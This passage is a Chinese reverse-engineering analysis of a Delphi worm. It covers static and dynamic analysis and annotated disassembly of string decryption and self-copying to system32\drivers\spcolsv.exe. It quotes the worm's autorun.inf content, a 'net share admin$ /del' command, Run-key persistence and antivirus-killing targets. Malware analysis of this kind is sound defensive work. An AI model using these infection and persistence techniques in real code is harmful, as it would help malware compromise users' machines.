先用PEID分析一下,Delphi寫的,沒有殼
靜態分析
用IDA靜態分析一下
字符串
字符串中有一些和註冊表項相關的字符串
Software\\Microsoft\\Windows\\CurrentVersion\\Run相關,應該是用來實現自啓動的,和關閉一些殺毒軟件自啓動的信息
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue,這個值爲0時不能顯示隱藏文件
Mcshield.exe等等很多的進程,這些都是殺毒軟件的名稱,應該是關閉殺毒軟件
c:\\test.txt,可能會用到這個文件
desktop.ini,是系統可識別的一個文件,作用是存儲用戶對文件夾的個性設置(用戶更換文件夾圖標等等都會生成desktop.ini)
[AutoRun]\r\nOPEN=setup.exe\r\nshellexecute=setup.exe\r\nshell\\Auto\\command=setup.exe\r\n、:\\autorun.inf和:\\setup.exe,系統文件cdvsd.vxd偵測是否有光盤放入光驅,如果有的話就開始尋找光盤目錄下 的AutoRun.inf文件,如果存在則執行inf。AutoRun.inf不僅能使光盤自啓還能作用與硬盤
cmd.exe /c net share admin$ /del /y,應該是網絡共享相關
導入函數
CriticalSection臨界區相關函數
VirtualFree、VirtualAlloc虛擬地址空間頁的分配釋放
LocalAlloc、LocalFree從堆中分配釋放內存
CreateThread,創建線程
CreateFileA、ReadFile、WriteFile創建、讀寫文件,
FindNextFileA,遍歷文件
RegSetValueExA、RegOpenKeyExA等註冊表函數
SetTimer等定時器函數
socket等網絡函數
OpenServiceA等操縱服務等函數
URLDownloadToFileA從遠程下載文件
大致分析可能存在的功能,管理進程,修改註冊表,修改文件,聯網、遠程下載等
動態分析
進程樹
目測只有這一個進程
進程行爲
也可以使用火絨劍
應該是新建了spcolsv程序
但是這裏沒有出現網絡訪問的情況,可能有一些觸發條件沒有達到
逆向分析
主函數梳理
直接IDA反編譯,我的IDA在分析字符串的時候有一些問題,Options->String litera style可以更改字符串解碼方式,選上c風格,編碼方式使用gb2312就可以正確顯示出前面幾個字符串了
看主函數
CODE:0040D0A0 push ebp CODE:0040D0A1 mov ebp, esp CODE:0040D0A3 add esp, 0FFFFFFE8h CODE:0040D0A6 push ebx CODE:0040D0A7 xor eax, eax CODE:0040D0A9 mov [ebp+var_18], eax CODE:0040D0AC mov [ebp+var_14], eax CODE:0040D0AF mov eax, offset dword_40CFF0 CODE:0040D0B4 call sub_4049E8 CODE:0040D0B9 mov ebx, offset Msg CODE:0040D0BE xor eax, eax CODE:0040D0C0 push ebp CODE:0040D0C1 push offset loc_40D1B5 CODE:0040D0C6 push dword ptr fs:[eax] CODE:0040D0C9 mov fs:[eax], esp CODE:0040D0CC mov eax, dword_40D1C4 CODE:0040D0D2 mov ds:dword_40F7E0, eax CODE:0040D0D8 mov eax, dword_40D1C8 CODE:0040D0DE mov ds:dword_40F7E4, eax CODE:0040D0E4 mov ax, word_40D1CC CODE:0040D0EB mov ds:word_40F7E8, ax CODE:0040D0F2 mov eax, offset dword_40F7D4 CODE:0040D0F7 mov edx, offset asc_40D1D8 ; "***武*漢*男*生*感*染*下*載*者***" CODE:0040D0FC call sub_403C98 CODE:0040D101 mov eax, offset unk_40F7D8 CODE:0040D106 mov edx, offset aMopery ; "感謝艾瑪,mopery,海色の月,對此木馬的關注!~" CODE:0040D10B call sub_403C98 CODE:0040D110 mov eax, offset unk_40F7DC CODE:0040D115 mov edx, offset sub_40D238 CODE:0040D11A call sub_403C98 CODE:0040D11F lea ecx, [ebp+var_14] CODE:0040D122 mov edx, offset aXboy ; "xboy" CODE:0040D127 mov eax, offset asc_40D270 ; "\"++戊+緩\"叛*聾+肛+刪\"蚊*苜+兆++*" CODE:0040D12C call sub_405360 ; 這裏的三個參數 CODE:0040D131 mov edx, [ebp+var_14] CODE:0040D134 mov eax, ds:dword_40F7D4 CODE:0040D139 call sub_404018 CODE:0040D13E jz short loc_40D149 ; 這個跳轉如果不成功,則程序直接退出了 CODE:0040D140 push 0 ; uExitCode CODE:0040D142 call ExitProcess_0 ; 這裏就退出了 CODE:0040D147 ; --------------------------------------------------------------------------- CODE:0040D147 jmp short loc_40D19A CODE:0040D149 ; --------------------------------------------------------------------------- CODE:0040D149 CODE:0040D149 loc_40D149: ; CODE XREF: start+9E↑j CODE:0040D149 lea ecx, [ebp+var_18] CODE:0040D14C mov edx, offset aWhboy_0 ; "whboy" CODE:0040D151 mov eax, offset aDTqTyldL ; "d}tq;*&tyld|l." CODE:0040D156 call sub_405360 CODE:0040D15B mov edx, [ebp+var_18] CODE:0040D15E mov eax, offset dword_40D2D8 CODE:0040D163 call sub_404018 CODE:0040D168 jz short loc_40D173 CODE:0040D16A push 0 ; uExitCode CODE:0040D16C call ExitProcess_0 CODE:0040D171 ; --------------------------------------------------------------------------- CODE:0040D171 jmp short loc_40D19A CODE:0040D173 ; --------------------------------------------------------------------------- CODE:0040D173 CODE:0040D173 loc_40D173: ; CODE XREF: start+C8↑j CODE:0040D173 call sub_4082F8 ;主要功能實現函數 CODE:0040D178 call sub_40CFB4 CODE:0040D17D call sub_40CED4 CODE:0040D182 jmp short loc_40D18A CODE:0040D184 ; --------------------------------------------------------------------------- CODE:0040D184 CODE:0040D184 loc_40D184: ; CODE XREF: start+F8↓j CODE:0040D184 push ebx ; lpMsg CODE:0040D185 call DispatchMessageA CODE:0040D18A CODE:0040D18A loc_40D18A: ; CODE XREF: start+E2↑j CODE:0040D18A push 0 ; wMsgFilterMax CODE:0040D18C push 0 ; wMsgFilterMin CODE:0040D18E push 0 ; hWnd CODE:0040D190 push ebx ; lpMsg CODE:0040D191 call GetMessageA CODE:0040D196 test eax, eax CODE:0040D198 jnz short loc_40D184 CODE:0040D19A CODE:0040D19A loc_40D19A: ; CODE XREF: start+A7↑j CODE:0040D19A ; start+D1↑j CODE:0040D19A xor eax, eax CODE:0040D19C pop edx CODE:0040D19D pop ecx CODE:0040D19E pop ecx CODE:0040D19F mov fs:[eax], edx CODE:0040D1A2 push offset loc_40D1BC CODE:0040D1A7 CODE:0040D1A7 loc_40D1A7: ; CODE XREF: start+11A↓j CODE:0040D1A7 lea eax, [ebp+var_18] CODE:0040D1AA mov edx, 2 CODE:0040D1AF call sub_403C68 CODE:0040D1B4 retn
很容易分析出函數傳遞參數是使用eax和edx
首先看sub_403C98的幾個調用處,這個函數的參數有兩個,第二個是字符串,第一個參數比較有意思,40F7D4、40F7D8和40F7DC,幾個連續的位置,且在BSS段中,估計是全局變量。
停在第一個sub_403C98的調用處,此時eax指向的位置是0,edx指向字符串"***武*漢*男*生*感*染*下*載*者***"
執行完之後,值變成了009f000c
繼續跟下去,發現此處的值變成了和原edx相同的字符串
暫時猜測sub_403C98可能是一個內存分配,並複製字符串的函數,觀測後面函數的行爲也是如此
接着看 sub_405360函數,sub_4053603個參數,第一個是一個很奇怪中的字符串"\"++戊+緩\"叛*聾+肛+刪\"蚊*苜+兆++*",第二個參數是字符串"xboy",第三個參數是局部變量var_14,也是沒有返回值。看後面有對局部變量var_14值的保存,所以這裏的返回值應該是通過局部變量var_14來傳遞
同樣觀測一下這個函數的返回值情況
函數執行前,局部變量中的值是0,執行完之後變成了009f000c,這個值之前看過,是前面的函數創建的內存
裏面的值就是之前的字符串值
再往下3句
CODE:0040D131 mov edx, [ebp+var_14] ;指向新建的字符串 CODE:0040D134 mov eax, ds:dword_40F7D4 ;這就是之前的固定字符串值 CODE:0040D139 call sub_404018
接着是這個函數的返回值處理
CODE:0040D13E jz short loc_40D149 ; 這個跳轉如果不成功,則程序直接退出了 CODE:0040D140 push 0 ; uExitCode CODE:0040D142 call ExitProcess_0 ; 這裏就退出了
猜測sub_404018應該是字符串比較函數,不等於0則直接退出了?如果正確,往下會執行一段和上面非常類似的函數。只不過傳遞的字符串變化了
CODE:0040D149 loc_40D149: ; CODE XREF: start+9E↑j CODE:0040D149 lea ecx, [ebp+var_18] CODE:0040D14C mov edx, offset aWhboy_0 ; "whboy" CODE:0040D151 mov eax, offset aDTqTyldL ; "d}tq;*&tyld|l." CODE:0040D156 call sub_405360 CODE:0040D15B mov edx, [ebp+var_18] CODE:0040D15E mov eax, offset dword_40D2D8 CODE:0040D163 call sub_404018 CODE:0040D168 jz short loc_40D173 CODE:0040D16A push 0 ; uExitCode CODE:0040D16C call ExitProcess_0
連續調用3個函數,這就是病毒的主要函數
CODE:0040D173 call sub_4082F8 CODE:0040D178 call sub_40CFB4 CODE:0040D17D call sub_40CED4
接下來就是GetMessageA和DispatchMessage,最後再調用了下面的函數,目測這部分就和程序邏輯沒有關係了,屬於語言加上的特定功能
CODE:0040D1A7 lea eax, [ebp+var_18] CODE:0040D1AA mov edx, 2 CODE:0040D1AF call sub_403C68
所以主函數需要關注的地方是sub_4082F8、sub_40CFB4和sub_40CED4這3個函數。另外,sub_405360中關於這兩個字符串的處理功能是幹什麼的也還不太明瞭。
sub_405360字符串解密函數分析
在程序中定義了一些字符串,他們的定義形式都是一個-1(這是用來管理引用的嗎),加上字符串長度,最後再加上字符串,這應該是語言對於字符串的底層定義實現。
回到字符串解析的主函數,代碼詳細註釋如下,最終的解密算法大致是逐次循環取得段字符串中字符,然後除以10的餘數和原字符串相異或
CODE:00405360 push ebp CODE:00405361 mov ebp, esp CODE:00405363 add esp, 0FFFFFFE8h CODE:00405366 push ebx CODE:00405367 push esi CODE:00405368 push edi CODE:00405369 xor ebx, ebx CODE:0040536B mov [ebp+var_18], ebx ; 清空局部變量 CODE:0040536E mov [ebp+var_10], ebx CODE:00405371 mov [ebp+var_14], ebx CODE:00405374 mov [ebp+return_val], ecx ; 這幾個局部變量的值對應函數參數 CODE:00405377 mov [ebp+short_str], edx CODE:0040537A mov [ebp+long_str], eax CODE:0040537D mov eax, [ebp+long_str] CODE:00405380 call sub_4040BC ; 參數個數爲1,通過eax傳遞,爲字符串 CODE:00405380 ; 這裏使用了lock指令,應該是和同步或是計數相關了 CODE:00405385 mov eax, [ebp+short_str] CODE:00405388 call sub_4040BC ; 參數個數爲1,通過eax傳遞,爲字符串 CODE:00405388 ; 這裏使用了lock指令,應該是和同步或是計數相關了 CODE:0040538D xor eax, eax CODE:0040538F push ebp CODE:00405390 push offset loc_40544A CODE:00405395 push dword ptr fs:[eax] ; 下面這兩句應該是和seh相關 CODE:00405398 mov fs:[eax], esp CODE:0040539B cmp [ebp+long_str], 0 CODE:0040539F jnz short loc_4053AB ; 字符串不爲空,所以這裏會跳轉 CODE:004053A1 mov eax, [ebp+return_val] CODE:004053A4 call sub_403C44 CODE:004053A9 jmp short loc_405422 CODE:004053AB ; --------------------------------------------------------------------------- CODE:004053AB CODE:004053AB loc_4053AB: ; CODE XREF: sub_405360+3F↑j CODE:004053AB lea eax, [ebp+var_14] CODE:004053AE mov edx, [ebp+short_str] CODE:004053B1 call sub_403CDC ; 傳入短字符串和一個局部變量的地址,讓var_14指向短字符串 CODE:004053B6 lea eax, [ebp+var_10] CODE:004053B9 call sub_403C44 CODE:004053BE mov eax, [ebp+long_str] CODE:004053C1 call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:004053C6 mov esi, eax CODE:004053C8 test esi, esi CODE:004053CA jle short loc_405417 CODE:004053CC mov ebx, 1 CODE:004053D1 CODE:004053D1 loc_4053D1: ; CODE XREF: sub_405360+B5↓j CODE:004053D1 mov eax, [ebp+var_14] ; 這是一個循環的開始,var_14應該是循環中使用的變量,esi作爲剩餘循環次數,ebx作爲當前長字串的遍歷位置(從0開始) CODE:004053D4 call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:004053D9 push eax ; 短字符串長度入棧 CODE:004053DA mov eax, ebx ; eax等於當前長字符串遍歷位置 CODE:004053DC pop edx ; edx指向字符串的長度 CODE:004053DD mov ecx, edx CODE:004053DF cdq ; edx會被清零,eax會被拓展成一個64位的數字 CODE:004053E0 idiv ecx ; 這裏就是使用長字符串的遍歷位置去除以短字符串的長度 CODE:004053E2 mov edi, edx CODE:004053E4 inc edi CODE:004053E5 mov eax, [ebp+var_14] CODE:004053E8 movzx eax, byte ptr [eax+edi-1] ; eax取得短字符串中的字符,第一次取得的是第二個字符而不是第一個 CODE:004053ED mov ecx, 0Ah CODE:004053F2 xor edx, edx CODE:004053F4 div ecx ; 字符串中某個字符除10,下面的代碼中沒有關商,只管了餘數 CODE:004053F6 mov eax, [ebp+long_str] CODE:004053F9 movzx eax, byte ptr [eax+ebx-1] ; eax取得長字符串中某個字符 CODE:004053FE xor edx, eax ; 使用餘數和長字符串中的字符進行異或操作 CODE:00405400 lea eax, [ebp+var_18] CODE:00405403 call sub_403E2C ; 這個函數將異或結果存放到var_18 CODE:00405408 mov edx, [ebp+var_18] CODE:0040540B lea eax, [ebp+var_10] CODE:0040540E call sub_403ED4 ; 這個函數將最終結果存放到局部變量var_10中 CODE:00405413 inc ebx CODE:00405414 dec esi CODE:00405415 jnz short loc_4053D1 ; 這是一個循環的開始,var_14應該是循環中使用的變量,esi作爲剩餘循環次數,ebx作爲當前長字串的遍歷位置(從0開始) CODE:00405417 CODE:00405417 loc_405417: ; CODE XREF: sub_405360+6A↑j CODE:00405417 mov eax, [ebp+return_val] CODE:0040541A mov edx, [ebp+var_10] CODE:0040541D call sub_403C98 ; 前面的循環中最後一個函數將值放入var_10,這裏就是將它作爲返回值,返回被解密的字符串
分析完了解密的字符串,回頭再看主函數中解密函數之後的就比較好理解了,解密處字符串,然後和原字符串進行一個比較,如果不正確則直接退出進程
sub_4082F8主要函數一
在ollydbg中,觀測每個函數的輸出輸出值,就能大致理順整個函數的框架
這個函數的邏輯中,會檢查文件的末尾一個字符是不是'0',這個可能是用來標記文件是否被感染的,後面再看,如果是,後面感染文件肯定還會碰到。
然後剩下的功能就是複製自己到system目錄之下,改個名字,再次執行一下,這樣就達到了僞裝成正常進程的目的。只有程序在system目錄下執行的時候纔會繼續往下執行,否則執行完這個函數就直接退出了。
將進程停在最後執行WinExec的步驟執行之前,查看這個進程的所有行爲
下面看代碼
CODE:00408300 push 0 CODE:00408302 push 0 ; 一次push是4字節 CODE:00408304 dec ecx ; 這裏相當於分配內存,依次分配8個字節 CODE:00408305 jnz short loc_408300 CODE:00408307 push ecx CODE:00408308 push ebx CODE:00408309 push esi CODE:0040830A push edi CODE:0040830B xor eax, eax CODE:0040830D push ebp CODE:0040830E push offset loc_4088DD CODE:00408313 push dword ptr fs:[eax] CODE:00408316 mov fs:[eax], esp CODE:00408319 lea edx, [ebp+path] CODE:0040831F xor eax, eax CODE:00408321 call get_path ; 參數1爲0,參數2爲局部變量var_3B8,返回值爲可執行文件絕對路徑的地址 CODE:00408326 mov eax, [ebp+path] CODE:0040832C lea edx, [ebp+path_no_exe] CODE:00408332 call sub_405684 ; 該函數執行完後,var_3B4存放路徑字符串的地址,和上面相比,沒有可執行文件的名字 CODE:00408337 lea eax, [ebp+path_no_exe] CODE:0040833D mov edx, offset aDesktopIni ; "Desktop_.ini" CODE:00408342 call sub_403ED4 ; 字符串追加,在路徑後面增加一個Desktop_.ini CODE:00408347 mov eax, [ebp+path_no_exe] CODE:0040834D call sub_4057A4 ; 這是判斷文件是否存在 CODE:00408352 test al, al ; 這裏返回了0 CODE:00408354 jz loc_4083E4 ; 跳轉 CODE:0040835A push 80h ; dwFileAttributes CODE:0040835F lea edx, [ebp+var_3C0] CODE:00408365 xor eax, eax CODE:00408367 call get_path CODE:0040836C mov eax, [ebp+var_3C0] CODE:00408372 lea edx, [ebp+var_3BC] CODE:00408378 call sub_405684 CODE:0040837D lea eax, [ebp+var_3BC] CODE:00408383 mov edx, offset aDesktopIni ; "Desktop_.ini" CODE:00408388 call sub_403ED4 CODE:0040838D mov eax, [ebp+var_3BC] CODE:00408393 call sub_4040CC CODE:00408398 push eax ; lpFileName CODE:00408399 call SetFileAttributesA CODE:0040839E push 1 ; dwMilliseconds CODE:004083A0 call Sleep CODE:004083A5 lea edx, [ebp+var_3C8] CODE:004083AB xor eax, eax CODE:004083AD call get_path CODE:004083B2 mov eax, [ebp+var_3C8] CODE:004083B8 lea edx, [ebp+var_3C4] CODE:004083BE call sub_405684 CODE:004083C3 lea eax, [ebp+var_3C4] CODE:004083C9 mov edx, offset aDesktopIni ; "Desktop_.ini" CODE:004083CE call sub_403ED4 CODE:004083D3 mov eax, [ebp+var_3C4] CODE:004083D9 call sub_4040CC CODE:004083DE push eax ; lpFileName CODE:004083DF call DeleteFileA CODE:004083E4 CODE:004083E4 loc_4083E4: ; CODE XREF: sub_4082F8+5C↑j CODE:004083E4 lea edx, [ebp+ab_path] ; 當前目錄不存在Desktop_.ini文件 CODE:004083EA xor eax, eax CODE:004083EC call get_path ; 然後又有一個局部變量指向了文件絕對路徑 CODE:004083F1 mov eax, [ebp+ab_path] CODE:004083F7 lea edx, [ebp+self_file] CODE:004083FA call sub_407760 ; 這裏好像是讀了整個自己的文件,很大的內存空間,還有頭文件的特殊標識 CODE:004083FF lea eax, [ebp+var_8] CODE:00408402 call sub_403C44 ; var_8的值好像也沒有改變 CODE:00408407 mov eax, [ebp+self_file] CODE:0040840A call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:0040840F mov ebx, eax ; 在之前的函數中,字符串前面4個字節存放的是字符串大小,這裏可能是語言的特性,讀出的值爲f200,也是該內存值前面4字節的數值。 CODE:0040840F ; 這裏應該是返回文件大小,因爲文件正好是61952字節 CODE:00408411 jmp short loc_408437 ; 文件長度不爲0 CODE:00408413 ; --------------------------------------------------------------------------- CODE:00408413 CODE:00408413 loc_408413: ; CODE XREF: sub_4082F8+14B↓j CODE:00408413 lea eax, [ebp+var_3D0] CODE:00408419 mov edx, [ebp+self_file] CODE:0040841C mov dl, [edx+ebx-1] CODE:00408420 call sub_403E2C CODE:00408425 mov edx, [ebp+var_3D0] CODE:0040842B lea eax, [ebp+var_8] CODE:0040842E mov ecx, [ebp+var_8] CODE:00408431 call sub_403F18 CODE:00408436 dec ebx CODE:00408437 CODE:00408437 loc_408437: ; CODE XREF: sub_4082F8+119↑j CODE:00408437 test ebx, ebx ; 文件長度不爲0 CODE:00408439 jle short loc_408445 ; 所以不跳轉 CODE:0040843B mov eax, [ebp+self_file] CODE:0040843E cmp byte ptr [eax+ebx-1], 0 ; 這裏比較文件的最後一個字節,看是不是0,病毒自身是爲0的,所以繼續往下走 CODE:00408443 jnz short loc_408413 CODE:00408445 CODE:00408445 loc_408445: ; CODE XREF: sub_4082F8+141↑j CODE:00408445 cmp [ebp+var_8], 0 ; 如果可執行文件的末尾一個字節不是0,則會修改這個局部變量,這裏直接往下走了 CODE:00408449 jnz loc_4085BA ; 如果是第二次啓動,那麼會跳轉到這裏執行 CODE:0040844F lea edx, [ebp+another_path] CODE:00408455 xor eax, eax CODE:00408457 call get_path ; 這個還是一個獲取路徑的函數 CODE:0040845C mov eax, [ebp+another_path] CODE:00408462 lea edx, [ebp+up_path] CODE:00408468 call sub_40532C ; 將路徑轉化爲大寫字母 CODE:0040846D mov eax, [ebp+up_path] CODE:00408473 push eax CODE:00408474 lea eax, [ebp+system32_path] CODE:0040847A call sub_4054BC ; 獲取路徑"C:\WINDOWS\system32\" CODE:0040847F push [ebp+system32_path] CODE:00408485 push offset aDrivers ; "drivers\\" CODE:0040848A push offset aSpcolsvExe ; "spcolsv.exe" CODE:0040848F lea eax, [ebp+total_path] CODE:00408495 mov edx, 3 CODE:0040849A call sub_403F8C ; 將3個路徑拼接起來,形成字符串"C:\WINDOWS\system32\drivers\spcolsv.exe" CODE:0040849F mov eax, [ebp+total_path] CODE:004084A5 lea edx, [ebp+up_total_path] CODE:004084AB call sub_40532C ; 完整路徑轉換成大寫字母 CODE:004084B0 mov edx, [ebp+up_total_path] CODE:004084B6 pop eax ; eax指向當前文件的大寫路徑 CODE:004084B7 call sub_404018 ; 返回0xf,應該是字符串判斷 CODE:004084BC jz loc_4085BA ; 我將可執行文件放在了桌面,所以這裏是不跳轉 CODE:004084C2 mov eax, offset aSpcolsvExe ; "spcolsv.exe" CODE:004084C7 call sub_4060D4 ; 以這個進程名做了兩次相同的操作,這個函數應該也是沒有返回值的 CODE:004084CC mov eax, offset aSpcolsvExe ; "spcolsv.exe" CODE:004084D1 call sub_4060D4 CODE:004084D6 push 80h CODE:004084DB lea eax, [ebp+system32_path2] CODE:004084E1 call sub_4054BC ; 再一次獲取system路徑 CODE:004084E6 push [ebp+system32_path2] CODE:004084EC push offset aDrivers ; "drivers\\" CODE:004084F1 push offset aSpcolsvExe ; "spcolsv.exe" CODE:004084F6 lea eax, [ebp+total_path2] CODE:004084FC mov edx, 3 CODE:00408501 call sub_403F8C ; 和前面一樣的拼接函數 CODE:00408506 mov eax, [ebp+total_path2] CODE:0040850C call sub_4040CC ; 傳入路徑,沒有返回值 CODE:00408511 push eax ; lpFileName CODE:00408512 call SetFileAttributesA CODE:00408517 push 1 ; dwMilliseconds CODE:00408519 call Sleep CODE:0040851E push 0 CODE:00408520 lea eax, [ebp+system32_path3] CODE:00408526 call sub_4054BC ; 還是獲取system32路徑 CODE:0040852B push [ebp+system32_path3] CODE:00408531 push offset aDrivers ; "drivers\\" CODE:00408536 push offset aSpcolsvExe ; "spcolsv.exe" CODE:0040853B lea eax, [ebp+var_3F0] CODE:00408541 mov edx, 3 CODE:00408546 call sub_403F8C ; 再次拼接 CODE:0040854B mov eax, [ebp+var_3F0] CODE:00408551 call sub_4040CC CODE:00408556 push eax ; lpNewFileName CODE:00408557 lea edx, [ebp+var_3F8] CODE:0040855D xor eax, eax CODE:0040855F call get_path CODE:00408564 mov eax, [ebp+var_3F8] CODE:0040856A call sub_4040CC CODE:0040856F push eax ; lpExistingFileName CODE:00408570 call CopyFileA ; 將自身文件複製到系統目錄下,僞裝成drivers/spcolsv.exe CODE:00408575 push 1 CODE:00408577 lea eax, [ebp+var_400] CODE:0040857D call sub_4054BC ; 然後又獲取system路徑 CODE:00408582 push [ebp+var_400] CODE:00408588 push offset aDrivers ; "drivers\\" CODE:0040858D push offset aSpcolsvExe ; "spcolsv.exe" CODE:00408592 lea eax, [ebp+var_3FC] CODE:00408598 mov edx, 3 CODE:0040859D call sub_403F8C ; 再次拼接 CODE:004085A2 mov eax, [ebp+var_3FC] CODE:004085A8 call sub_4040CC CODE:004085AD push eax ; lpCmdLine CODE:004085AE call WinExec ; 這裏是執行system目錄下的可執行文件了,然後自己就退出了 CODE:004085B3 push 0 ; uExitCode CODE:004085B5 call ExitProcess_0 CODE:004085BA ; --------------------------------------------------------------------------- CODE:004085BA CODE:004085BA loc_4085BA: ; CODE XREF: sub_4082F8+151↑j CODE:004085BA ; sub_4082F8+1C4↑j CODE:004085BA mov eax, [ebp+var_8] ; 如果是第二次啓動,那麼會跳轉到這裏執行 CODE:004085BD call str_length ; 這裏應該返回0,因爲還是自身,var_8沒有改變,還是0 CODE:004085C2 mov ecx, eax CODE:004085C4 lea eax, [ebp+self_file] CODE:004085C7 mov edx, ebx CODE:004085C9 call sub_40416C ; 參數1爲文件內容,參數二爲文件大小,參數3爲0 CODE:004085CE jmp loc_40889D ; 這裏需要跳轉 CODE:004085D3 ; --------------------------------------------------------------------------- CODE:004085D3 CODE:004085D3 loc_4085D3: ; CODE XREF: sub_4082F8+5B4↓j CODE:004085D3 lea eax, [ebp+var_14] CODE:004085D6 push eax CODE:004085D7 mov edx, [ebp+var_8] CODE:004085DA mov eax, offset dword_408934 CODE:004085DF call sub_4041B4 CODE:004085E4 mov ecx, eax CODE:004085E6 dec ecx CODE:004085E7 mov edx, 1 CODE:004085EC mov eax, [ebp+var_8] CODE:004085EF call sub_40412C CODE:004085F4 lea eax, [ebp+var_14] CODE:004085F7 mov ecx, 5 CODE:004085FC mov edx, 1 CODE:00408601 call sub_40416C CODE:00408606 lea eax, [ebp+var_C] CODE:00408609 push eax CODE:0040860A mov edx, [ebp+var_14] CODE:0040860D mov eax, offset dword_408940 CODE:00408612 call sub_4041B4 CODE:00408617 mov ecx, eax CODE:00408619 dec ecx CODE:0040861A mov edx, 1 CODE:0040861F mov eax, [ebp+var_14] CODE:00408622 call sub_40412C CODE:00408627 mov edx, [ebp+var_14] CODE:0040862A mov eax, offset dword_408940 CODE:0040862F call sub_4041B4 CODE:00408634 mov ecx, eax CODE:00408636 lea eax, [ebp+var_14] CODE:00408639 mov edx, 1 CODE:0040863E call sub_40416C CODE:00408643 mov eax, [ebp+var_14] CODE:00408646 call sub_405870 CODE:0040864B mov [ebp+var_18], eax CODE:0040864E xor eax, eax CODE:00408650 push ebp CODE:00408651 push offset loc_4086D6 CODE:00408656 push dword ptr fs:[eax] CODE:00408659 mov fs:[eax], esp CODE:0040865C mov edx, [ebp+var_C] CODE:0040865F lea eax, [ebp+var_1E4] CODE:00408665 call sub_402AD8 CODE:0040866A mov eax, ds:off_40E2BC CODE:0040866F mov byte ptr [eax], 2 CODE:00408672 lea eax, [ebp+var_1E4] CODE:00408678 call sub_402868 CODE:0040867D call sub_402614 CODE:00408682 lea eax, [ebp+var_404] CODE:00408688 push eax CODE:00408689 mov eax, [ebp+self_file] CODE:0040868C call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:00408691 mov edx, eax CODE:00408693 sub edx, [ebp+var_18] CODE:00408696 mov ecx, [ebp+var_18] CODE:00408699 mov eax, [ebp+self_file] CODE:0040869C call sub_40412C CODE:004086A1 mov edx, [ebp+var_404] CODE:004086A7 lea eax, [ebp+var_1E4] CODE:004086AD call sub_404260 CODE:004086B2 call sub_402B88 CODE:004086B7 call sub_402614 CODE:004086BC lea eax, [ebp+var_1E4] CODE:004086C2 call sub_402C48 CODE:004086C7 call sub_402614 CODE:004086CC xor eax, eax CODE:004086CE pop edx CODE:004086CF pop ecx CODE:004086D0 pop ecx CODE:004086D1 mov fs:[eax], edx CODE:004086D4 jmp short loc_4086E0 CODE:004086D6 ; --------------------------------------------------------------------------- CODE:004086D6 CODE:004086D6 loc_4086D6: ; DATA XREF: sub_4082F8+359↑o CODE:004086D6 jmp sub_403538 CODE:004086DB ; --------------------------------------------------------------------------- CODE:004086DB call sub_4036F0 CODE:004086E0 CODE:004086E0 loc_4086E0: ; CODE XREF: sub_4082F8+3DC↑j CODE:004086E0 call sub_407C74 CODE:004086E5 mov eax, offset aSpcolsvExe ; "spcolsv.exe" CODE:004086EA call sub_405568 CODE:004086EF test al, al CODE:004086F1 jnz loc_408896 CODE:004086F7 push 80h CODE:004086FC lea eax, [ebp+var_40C] CODE:00408702 call sub_4054BC CODE:00408707 push [ebp+var_40C] CODE:0040870D push offset aDrivers ; "drivers\\" CODE:00408712 push offset aSpcolsvExe ; "spcolsv.exe" CODE:00408717 lea eax, [ebp+var_408] CODE:0040871D mov edx, 3 CODE:00408722 call sub_403F8C CODE:00408727 mov eax, [ebp+var_408] CODE:0040872D call sub_4040CC CODE:00408732 push eax ; lpFileName CODE:00408733 call SetFileAttributesA CODE:00408738 push 1 ; dwMilliseconds CODE:0040873A call Sleep CODE:0040873F lea eax, [ebp+uCmdShow] CODE:00408745 call sub_4054BC CODE:0040874A push [ebp+uCmdShow] ; uCmdShow CODE:00408750 push offset aDrivers ; "drivers\\" CODE:00408755 push offset aSpcolsvExe ; "spcolsv.exe" CODE:0040875A lea eax, [ebp+var_410] CODE:00408760 mov edx, 3 CODE:00408765 call sub_403F8C CODE:0040876A mov eax, [ebp+var_410] CODE:00408770 call sub_4040CC CODE:00408775 push eax ; lpFileName CODE:00408776 call DeleteFileA CODE:0040877B mov eax, [ebp+self_file] CODE:0040877E call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:00408783 mov edx, eax CODE:00408785 sub edx, [ebp+var_18] CODE:00408788 lea eax, [ebp+self_file] CODE:0040878B mov ecx, [ebp+var_18] CODE:0040878E call sub_40416C CODE:00408793 mov eax, [ebp+self_file] CODE:00408796 call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:0040879B push eax CODE:0040879C mov eax, [ebp+self_file] CODE:0040879F call str_length ; 字符串-4的位置存放的是字符串的位置,該函數返回該字符串的長度 CODE:004087A4 mov edx, eax CODE:004087A6 lea eax, [ebp+self_file] CODE:004087A9 pop ecx CODE:004087AA call sub_40416C CODE:004087AF lea eax, [ebp+var_10] CODE:004087B2 mov edx, [ebp+self_file] CODE:004087B5 call sub_403CDC ; 這個函數中,如果字符串-8位置的值爲-1,則什麼都不會做,返回了 CODE:004087BA xor eax, eax CODE:004087BC push ebp CODE:004087BD push offset loc_40888C CODE:004087C2 push dword ptr fs:[eax] CODE:004087C5 mov fs:[eax], esp CODE:004087C8 lea eax, [ebp+var_41C] CODE:004087CE call sub_4054BC CODE:004087D3 push [ebp+var_41C] CODE:004087D9 push offset aDrivers ; "drivers\\" CODE:004087DE push offset aSpcolsvExe ; "spcolsv.exe" CODE:004087E3 lea eax, [ebp+var_418] CODE:004087E9 mov edx, 3 CODE:004087EE call sub_403F8C CODE:004087F3 mov edx, [ebp+var_418] CODE:004087F9 lea eax, [ebp+var_3B0] CODE:004087FF call sub_402AD8 CODE:00408804 mov eax, ds:off_40E2BC CODE:00408809 mov byte ptr [eax], 2 CODE:0040880C lea eax, [ebp+var_3B0] CODE:00408812 call sub_402868 CODE:00408817 call sub_402614 CODE:0040881C mov edx, [ebp+var_10] CODE:0040881F lea eax, [ebp+var_3B0] CODE:00408825 call sub_404260 CODE:0040882A call sub_402B88 CODE:0040882F call sub_402614 CODE:00408834 lea eax, [ebp+var_3B0] CODE:0040883A call sub_402C48 CODE:0040883F call sub_402614 CODE:00408844 push 1 CODE:00408846 lea eax, [ebp+var_424] CODE:0040884C call sub_4054BC CODE:00408851 push [ebp+var_424] CODE:00408857 push offset aDrivers ; "drivers\\" CODE:0040885C push offset aSpcolsvExe ; 